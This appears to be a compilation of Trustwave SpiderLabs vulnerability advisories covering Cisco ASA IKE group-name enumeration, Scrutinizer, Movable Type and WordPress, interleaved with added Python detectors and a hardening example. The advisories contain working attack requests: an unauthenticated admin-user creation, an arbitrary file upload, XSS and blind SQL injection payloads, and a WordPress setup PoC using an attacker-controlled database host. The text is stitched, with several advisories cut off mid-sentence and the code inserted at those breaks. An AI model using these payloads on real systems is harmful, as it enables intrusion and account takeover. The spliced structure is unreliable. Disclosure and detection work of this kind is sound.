TWSL2013-004: Group Name Enumeration Vulnerability in Cisco IKE Implementation
Trustwave SpiderLabs Security Advisory TWSL2013-004:
Group Name Enumeration Vulnerability in Cisco IKE Implementation

https://www.trustwave.com/spiderlabs/advisories/TWSL2013-004.txt

Published: 04/18/13
Version: 1.0

Vendor: Cisco (www.cisco.com)
Product: ASA (Adaptive Security Appliance)
Versions affected: 8.4(2), 8.4(5), 9.1(1)

Product description:
The Cisco ASA 5505 Adaptive Security Appliance is a next-generation, full-featured security appliance for small business, branch office, and enterprise teleworker environments. The Cisco ASA 5505 delivers high-performance firewall, SSL and IPsec VPN, and rich networking services in a modular, plug-and-play appliance.

Finding 1: Group Name Enumeration
Credit: Daniel Turner of Trustwave SpiderLabs
CVE: CVE-2013-1194
CWE: CWE-206

Each VPN configuration is assigned a group name, which is used to manage separate Security Associations. Previous advisories have found that when a VPN endpoint is configured to allow Aggressive Mode IKE negotiations using a PSK, a hash of the PSK can be captured and potentially cracked offline. In order to successfully crack this hash, a correct group name is required.

The above product versions are susceptible to a group name enumeration vulnerability because of a difference in the way the device responds to correct and incorrect group names sent in the initial exchange packet. This is similar to CSCeg00323 and CSCtj96108, where enumeration was possible because of no response and a response with a DPD payload respectively. It has been found that it remains possible to distinguish a correct group name by the number of response packets sent by the device. A correct group name elicits three attempts to continue the handshake and an additional encrypted phase 2 packet, while the device responds only twice to an incorrect group name. Enumeration is slow because of the need to wait for the response packets, but it has been successfully accomplished.

Below are examples of the different responses:

Example 1:

#Request using invalid group name
ike-scan 10.70.70.25 -M -A --id=incorrectgroup

#Response using invalid group name
13:22:59.929273 IP 10.70.70.204.isakmp > 10.70.70.25.isakmp: isakmp: phase 1 I agg
13:22:59.932624 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:05.696571 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg

Example 2:

#Request using valid group name
ike-scan 10.70.70.25 -M -A --id=correctgroup

#Response using valid group name
13:23:05.693673 IP 10.70.70.204.isakmp > 10.70.70.25.isakmp: isakmp: phase 1 I agg
13:23:13.690392 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:21.690464 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:29.690528 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg
13:23:37.691275 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 2/others R inf[E]

This information can be used to capture and crack a weak PSK if Aggressive Mode is enabled.

Remediation Steps:
The vendor will be releasing security fixes for the above issues; affected versions can be patched by installing the 8.4(6) firmware or the 9.1(2) firmware for the Cisco ASA platform. Administrators with other affected firmware versions should be aware that this information could potentially be revealed, and it is recommended that factory default or easily guessable group names not be used.

Additional Credits:
Jonathan Claudius of Trustwave SpiderLabs: Confirmation of Vulnerability/Behavior on Cisco ASA 8.4(5) and 9.1(1)

Revision History:
02/21/13 - Vulnerability disclosed
03/14/13 - Vendor acknowledges security issue
04/17/13 - Vendor releases security alert
04/18/13 - Advisory published

References
1. http://www.cisco.com/warp/public/707/cisco-sn-20050624-vpn-grpname.shtml
2. http://www.cisco.com/en/US/products/csr/cisco-sr-20101124-vpn-grpname.html
3. http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1194

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is
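The enumeration described in this advisory has a simple network signature: each candidate group name costs the prober one new Aggressive Mode initiation ("phase 1 I agg") towards the same responder, so a burst of those from one source is what a defender should look for, whatever the device answers. The following is an added example, not part of the advisory or of any Cisco tooling. It parses tcpdump ISAKMP summary lines in the format quoted above and flags (initiator, responder) pairs that exceed a threshold inside a sliding window. The window and threshold values, the extra probe lines, and the ordinary peer 192.0.2.10 (a documentation address) are constructed for the example.

```python
import re
from collections import defaultdict

# Added example (not from the advisory or from Cisco): parse tcpdump-style ISAKMP summary
# lines like the ones quoted in the advisory and flag initiators that open many Aggressive
# Mode exchanges against one responder in a short window. One "phase 1 I agg" per candidate
# group name is what an enumeration attempt looks like on the wire, regardless of the answer.

LINE_RE = re.compile(
    r"^(?P<h>\d{2}):(?P<m>\d{2}):(?P<s>\d{2})\.(?P<us>\d{6}) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.isakmp > (?P<dst>\d+\.\d+\.\d+\.\d+)\.isakmp: "
    r"isakmp: phase (?P<phase>1|2/others) (?P<dir>[IR]) (?P<xchg>\S+)$"
)


def parse_line(line):
    """Return a dict for one tcpdump ISAKMP line, or None if the line is something else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"]) + int(m["us"]) / 1e6
    return {"ts": ts, "src": m["src"], "dst": m["dst"],
            "phase": m["phase"], "dir": m["dir"], "xchg": m["xchg"]}


def aggressive_initiations(lines):
    """Map (initiator, responder) -> sorted timestamps of 'phase 1 I agg' packets."""
    seen = defaultdict(list)
    for line in lines:
        p = parse_line(line)
        if p and p["phase"] == "1" and p["dir"] == "I" and p["xchg"] == "agg":
            seen[(p["src"], p["dst"])].append(p["ts"])
    return {pair: sorted(ts) for pair, ts in seen.items()}


def flag_enumeration(lines, window_s=600, threshold=10):
    """Return (initiator, responder) pairs with >= threshold AM initiations inside window_s."""
    alerts = []
    for pair, stamps in aggressive_initiations(lines).items():
        lo = 0
        for hi, t in enumerate(stamps):
            while t - stamps[lo] > window_s:  # slide the window's left edge forward
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts.append(pair)
                break
    return alerts


def build_sample():
    """Constructed capture: the advisory's two probes, a burst of further probes from the
    same host, and one ordinary peer (192.0.2.10) doing a single Main Mode negotiation."""
    lines = [
        "13:22:59.929273 IP 10.70.70.204.isakmp > 10.70.70.25.isakmp: isakmp: phase 1 I agg",
        "13:22:59.932624 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg",
        "13:23:05.693673 IP 10.70.70.204.isakmp > 10.70.70.25.isakmp: isakmp: phase 1 I agg",
        "13:23:13.690392 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 1 R agg",
        "13:23:37.691275 IP 10.70.70.25.isakmp > 10.70.70.204.isakmp: isakmp: phase 2/others R inf[E]",
        "13:30:00.000000 IP 192.0.2.10.isakmp > 10.70.70.25.isakmp: isakmp: phase 1 I ident",
        "13:30:00.004000 IP 10.70.70.25.isakmp > 192.0.2.10.isakmp: isakmp: phase 1 R ident",
    ]
    for i in range(12):  # constructed: one more probe every 8 seconds starting 13:24:00
        sec = 13 * 3600 + 24 * 60 + 8 * i
        h, rem = divmod(sec, 3600)
        m, s = divmod(rem, 60)
        lines.append(f"{h:02d}:{m:02d}:{s:02d}.000000 IP 10.70.70.204.isakmp > "
                     "10.70.70.25.isakmp: isakmp: phase 1 I agg")
    return lines


if __name__ == "__main__":
    for src, dst in flag_enumeration(build_sample()):
        print(f"possible IKE group-name enumeration: {src} -> {dst}")
```

Feed it the output of a capture such as `tcpdump -n udp port 500` taken in front of the concentrator. A legitimate road warrior produces one initiation per connection, so a threshold of ten in ten minutes is conservative; tune it to the site's reconnect rate, and treat a hit as a prompt to check whether Aggressive Mode and guessable group names are still in use.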
TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer

Published: 07/27/12
Version: 1.0

Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899); prior versions may be affected as well. Please note that the software can be found in a long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html for the partial list.

Product description:
Network analysis tool for monitoring overall network health; it reports on which hosts, applications, protocols, etc. are consuming network bandwidth.

Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave SpiderLabs

Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626

The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization are controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users.

Example(s):

This request will add a user named trustwave with the password trustwave to the administrative user group.

#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70

tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8

{"new_user_id":2}

Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627

The Scrutinizer web console is prone to an unauthenticated arbitrary file upload vulnerability. An attacker could exploit this vulnerability to upload files to the affected system's file system as well as overwrite the Scrutinizer application's SNMP configuration.

Example(s):

This request will upload a test file to the following location: 'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'

Note: This affected folder also contains SNMP configuration files, which could be overwritten if an attacker were to select the right file name.

#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210

--_Part_949_3365333252_3066945593
Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream

trustwave
--_Part_949_3365333252_3066945593--

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html

{"success":1,"file_name":"trustwave.txt"}

#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave

Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848

The Scrutinizer web console suffers from multiple Cross Site Scripting vulnerabilities in the following pages:

1.) /d4d/contextMenu.php
2.) /d4d/exporters.php

These vulnerabilities include the following:

1.) XSS via arbitrary parameter
3.) XSS via referrer header

Example(s):

The following two examples demonstrate the above-mentioned vulnerabilities on exporters.php.

#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>

#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2

#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>

Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951

The Scrutinizer application relies on an underlying Apache, MySQL and PHP installation which is installed as part of the scrutinizer installer
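Findings 1 and 2 above share one root cause: privileged endpoints (adding a user, writing into the MIB directory) act on whatever parameters arrive, without first tying the request to a live session, and the upload path applies no restriction to the file name. The following is an added example, not Plixer's code and not taken from the advisory. It models the two controls in a small Python handler: a session lookup that must succeed with the admin role before either action runs, and a file-name check that rejects traversal, unexpected characters and extensions, and any overwrite of a file already present in the target directory. The Request and Sessions classes, the handler names, the extension allowlist and the directory `/srv/mibs` are all hypothetical.

```python
import os
import re
import secrets
from dataclasses import dataclass, field

# Added example, not Plixer's code: a minimal model of the two controls the Scrutinizer
# findings show missing. Request, Sessions and the handler names are hypothetical.


@dataclass
class Request:
    path: str
    params: dict
    cookies: dict = field(default_factory=dict)


class Sessions:
    """Server-side session store keyed by an unguessable cookie value."""

    def __init__(self):
        self._live = {}

    def login(self, user, role):
        token = secrets.token_urlsafe(32)
        self._live[token] = {"user": user, "role": role}
        return token

    def lookup(self, token):
        return self._live.get(token)


def require_role(sessions, request, role):
    """Session for this request if its cookie names a live session with `role`, else None."""
    session = sessions.lookup(request.cookies.get("session", ""))
    if session is None or session["role"] != role:
        return None
    return session


USERS = {}


def handle_add_user(sessions, request):
    """Finding 1: adding a user is privileged, so it is gated on the session, not merely on
    the request reaching admin.cgi / userprefs.cgi with the right parameters."""
    if require_role(sessions, request, "admin") is None:
        return 401, {"error": "authentication required"}
    name, pwd = request.params.get("newUser"), request.params.get("pwd")
    if not name or not pwd:
        return 400, {"error": "missing newUser or pwd"}
    USERS[name] = {"group": request.params.get("selectedUserGroup", "0")}
    return 200, {"new_user_id": len(USERS)}


SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
ALLOWED_EXT = {".txt", ".mib"}  # hypothetical allowlist for the MIB directory


def safe_upload_path(upload_dir, filename, exists=os.path.exists):
    """Finding 2: accept only a plain name with an allowed extension, and never overwrite a
    file already in the directory (the SNMP configuration lives there)."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or not SAFE_NAME.match(base):
        return None
    if os.path.splitext(base)[1].lower() not in ALLOWED_EXT:
        return None
    dest = os.path.join(upload_dir, base)
    return None if exists(dest) else dest


def handle_upload(sessions, request, upload_dir, exists=os.path.exists):
    """The upload endpoint needs both controls: an authenticated admin and a vetted path."""
    if require_role(sessions, request, "admin") is None:
        return 401, {"error": "authentication required"}
    dest = safe_upload_path(upload_dir, request.params.get("filename", ""), exists)
    if dest is None:
        return 400, {"error": "file name rejected"}
    return 200, {"success": 1, "file_name": os.path.basename(dest)}


if __name__ == "__main__":
    sessions = Sessions()
    anon = Request("/cgi-bin/admin.cgi", {"newUser": "trustwave", "pwd": "trustwave"})
    print(handle_add_user(sessions, anon))  # no session cookie: rejected with 401
    token = sessions.login("admin", "admin")
    probe = Request("/d4d/uploader.php", {"filename": "../snmp.conf"}, {"session": token})
    print(handle_upload(sessions, probe, "/srv/mibs"))  # traversal name: rejected with 400
```

The `exists` parameter is injected so the overwrite rule can be exercised without touching a real directory; in production the default `os.path.exists` applies. Note that the check compares the sanitised base name with the submitted name, so `..\snmp.conf` and `../snmp.conf` are rejected outright rather than silently renamed.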
TWSL2012-008: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
Trustwave SpiderLabs Security Advisory TWSL2012-008:
Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt

Published: 04/11/12
Version: 1.0

Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: 8.6.2 (8.6.2.16204) confirmed; others may be vulnerable

Product description:
Network analysis tool for monitoring overall network health; it reports on which hosts, applications, protocols, etc. are consuming network bandwidth.

Credit: Tanya Secker of Trustwave SpiderLabs

Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-1258

The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization are controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users.

Example:

This request will add a user named trustwave with the password trustwave to the administrative user group.

#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19

{"new_user_id":9}

Finding 2: SQL Injection
CVE: CVE-2012-1259

The Scrutinizer web console is prone to unauthenticated SQL Injection attacks because user input is not appropriately validated and is passed directly to the backend. An attacker could exploit this vulnerability to attempt to gain access to sensitive information within the database or to perform other attacks on the system.

Example 1:

The requests/responses below show a blind SQL injection vector, where a proof of concept is used to return a syntactically correct response from the server (200 OK) followed by an incorrect one (500 Internal Server Error).

#Request 1
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20AND%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 1
HTTP/1.1 200 OK
Date: Tue, 31 Jan 2012 23:51:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 230

#Request 2
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20ANffD%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 2
HTTP/1.1 500 Internal Server Error
Date: Tue, 31 Jan 2012 23:52:18 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT
ETag: "90001d93e-448-497918ae295c0"
Accept-Ranges: bytes
Content-Length: 1096
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

Example 2:

The getPermissionsAndPreferences variable within the following request is also vulnerable to a blind time-based attack. The example payload included will cause the server to delay approximately five seconds before returning a response.

#Request
http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&session_id=OyAOiECuFdtRbEBY&nocache=12_13_12_734

Example 3:
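Both injection examples in Finding 2 leave a recognisable trace in the web server's access log: a quote-balanced tautology in a parameter value, a deliberately broken variant of it that turns the 200 into a 500, and a `SLEEP()` call in a value that should be numeric. The following is an added example, not part of the advisory and not Plixer's code, that scans Apache combined-format log lines for those shapes after percent-decoding the query string. The log lines are constructed to mirror the requests above; the rule set and labels are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Added example, not from the advisory or from Plixer: scan Apache combined-format access
# log lines for the two blind injection shapes the advisory shows (a quote-balanced
# tautology whose broken twin changes the response status, and a SLEEP()-style delay).

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SQLI_RULES = [
    (re.compile(r"'\s*\)?\s*(?:and|or)\s*\(?\s*'", re.I), "boolean tautology"),
    (re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I), "time-based"),
    (re.compile(r"\bunion\s+(?:all\s+)?select\b|\binformation_schema\b", re.I), "union/schema probe"),
]


def parse_access_line(line):
    """Split one combined-format line into fields plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # parse_qsl percent-decodes, so "%27)%20AND%20(%27a" is inspected as "') AND ('a"
    rec["params"] = parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec


def classify_params(params, status):
    """Yield (param, label) for every decoded parameter value that looks like an injection."""
    for name, value in params:
        labels = [label for rule, label in SQLI_RULES if rule.search(value)]
        if not labels and status >= 500 and "'" in value:
            # the advisory's second probe: a mangled keyword that breaks the query outright
            labels = ["quote with server error"]
        for label in labels:
            yield name, label


def scan(lines):
    """Return (ip, param, label, status) for every suspicious request in the log."""
    alerts = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        for name, label in classify_params(rec["params"], rec["status"]):
            alerts.append((rec["ip"], name, label, rec["status"]))
    return alerts


UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
REF = "http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi"
SAMPLE_LOG = [  # constructed lines mirroring the advisory's probes, plus one benign request
    f'127.0.0.1 - - [31/Jan/2012:23:51:46 +0000] "GET /cgi-bin/scrut_fa_exclusions.cgi?addip=%27)%20AND%20(%27a%27=%27a&nbaupdate=1 HTTP/1.1" 200 230 "{REF}" "{UA}"',
    f'127.0.0.1 - - [31/Jan/2012:23:52:18 +0000] "GET /cgi-bin/scrut_fa_exclusions.cgi?addip=%27)%20ANffD%20(%27a%27=%27a&nbaupdate=1 HTTP/1.1" 500 1096 "{REF}" "{UA}"',
    f'127.0.0.1 - - [31/Jan/2012:23:55:02 +0000] "GET /cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&nocache=12_13_12_734 HTTP/1.1" 200 512 "-" "{UA}"',
    f'127.0.0.1 - - [31/Jan/2012:23:58:40 +0000] "GET /cgi-bin/scrut_fa_exclusions.cgi?addip=10.0.0.5&nbaupdate=1 HTTP/1.1" 200 230 "{REF}" "{UA}"',
]

if __name__ == "__main__":
    for ip, param, label, status in scan(SAMPLE_LOG):
        print(f"{ip} {param}: {label} (HTTP {status})")
```

The decode step matters: matching the raw request line would miss `%27` and `%20` encodings, and matching only on keywords would miss the broken-probe variant, which is why a quote in a parameter on a 5xx response is flagged on its own. Time-based probes need the response time to be logged (`%D` in Apache's LogFormat) to confirm the delay; the keyword rule here only catches the request half.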
TWSL2012-003: Cross-Site Scripting Vulnerability in Movable Type Publishing Platform
Trustwave's SpiderLabs Security Advisory TWSL2012-003:
Cross-Site Scripting Vulnerability in Movable Type Publishing Platform

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-003.txt

Published: 2012-02-24
Version: 1.0

Vendor: Six Apart (http://movabletype.org/)
Product: Movable Type
Version affected: Versions prior to 5.13, 5.07, and 4.38

Product description:
Movable Type is a weblog publishing system developed by the company Six Apart. The software supports static page generation and includes functionality such as managing files, user roles, templates, tags, categories, and trackback links.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2012-1262

After extracting the Movable Type CGI files and source files onto a web server, but before the application is fully installed, cross-site scripting vulnerabilities are present in the '/cgi-bin/mt/mt-wizard.cgi' page.

Example(s):

Performing XSS on the dbuser parameter

#Request
POST /cgi-bin/mt/mt-wizard.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/cgi-bin/mt/mt-wizard.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 216

__mode=test&step=configure&set_static_uri_to=&default_language=en-us&config=&dbtype=mysql&dbserver=localhost&dbname=&dbuser=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&dbpass=test&dbpath=&dbport=&dbsocket=&test=1

#Response
--snip---
<p>Connection error: Access denied for user '<script>alert('123')</script>'@'localhost' (using password: YES) at /var/www/cgi-bin/mt/extlib/Data/ObjectDriver/Driver/BaseCache.pm line 320
--snip---

Vendor Response:
These issues have been addressed as of versions 5.13, 5.07, and 4.38.

Remediation Steps:
Customers should update to the latest version of the Movable Type publishing platform in order to address these issues. The above issues have been corrected in versions 5.13, 5.07, and 4.38.

Revision History:
01/11/12 - Vulnerability disclosed
02/21/12 - Patch released
02/24/12 - Advisory published

References
1. http://www.movabletype.org/2012/02/movable_type_513_507_and_438_security_updates.html

About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this
TWSL2012-002: Multiple Vulnerabilities in WordPress
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt

Published: 1/24/12
Version: 1.0

Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior

Product description:
WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page
CVE: CVE-2011-4899

The WordPress 'setup-config.php' installation page allows users to install WordPress using a local or remote MySQL database. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious JavaScript can be injected into the content of WordPress, yielding persistent Cross Site Scripting.

Proof of Concept:

Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance

1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306

2.) Performs POST/GET Requests to Install WordPress into MySQL Instance

Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
